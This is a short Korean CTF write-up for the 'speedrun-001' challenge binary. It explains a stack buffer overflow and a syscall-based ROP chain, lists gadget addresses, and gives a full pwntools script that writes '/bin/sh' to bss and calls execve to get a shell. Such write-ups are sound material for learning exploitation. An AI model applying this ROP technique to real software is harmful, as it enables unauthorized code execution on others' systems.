How to Solve
- IDA로 디스어셈블링하면 sub_400B60 함수에서 변수 buf의 크기가 0x400인데 read()에서 0x7D0만큼 입력을 받으므로 BOF가 발생한다.
gdb speedrun-001, checksec : NX가 걸려있으므로 read 함수에서 bss 영역에 "/bin/sh"를 넣어준 뒤, execve 함수로 execve("/bin/sh")를 실행시키자.file speedrun-001 : static linking 되어 있으므로 system call을 이용하자. read()의 syscall number는 0, execve()는 59이다.
Design the Payload
read(0, address of bss, 8);
execve("/bin/sh", NULL, NULL);
Find the gadget : ROPgadget --binary speedrun-001 | grep
| code |
adress |
pop rdi ; ret |
0x400686 |
pop rsi ; ret |
0x4101f3 |
pop rdx ; ret |
0x4498b5 |
pop rax ; ret |
0x415664 |
syscall ; ret |
0x474e65 |
Exploit Code
from pwn import *
p=process('./speedrun-001')
def dd(payload):
p.recvuntil('Any last words?')
p.sendline(payload)
rdi=0x400686
rsi=0x4101f3
rdx=0x4498b5
rax=0x415664
syscall=0x474e65
main=0x400BC1
bss=0x6bbb00
payload='A'*0x400 # buf
payload+=p64(bss-0x100) # sfp
payload+=p64(rdi)+p64(0) # fd
payload+=p64(rsi)+p64(bss) # *buf
payload+=p64(rdx)+p64(8) # size
payload+=p64(rax)+p64(0) # syscall number
payload+=p64(syscall)
payload+=p64(main) # ret to main
dd(payload)
p.send("/bin/sh\x00")
payload='A'*0x400 # buf
payload+='B'*8 # sfp
payload+=p64(rdi)+p64(bss) # "/bin/sh\x00"
payload+=p64(rsi)+p64(0) # NULL
payload+=p64(rdx)+p64(0) # NULL
payload+=p64(rax)+p64(59) # syscall number
payload+=p64(syscall)
dd(payload)
p.interactive()
Get The Shell
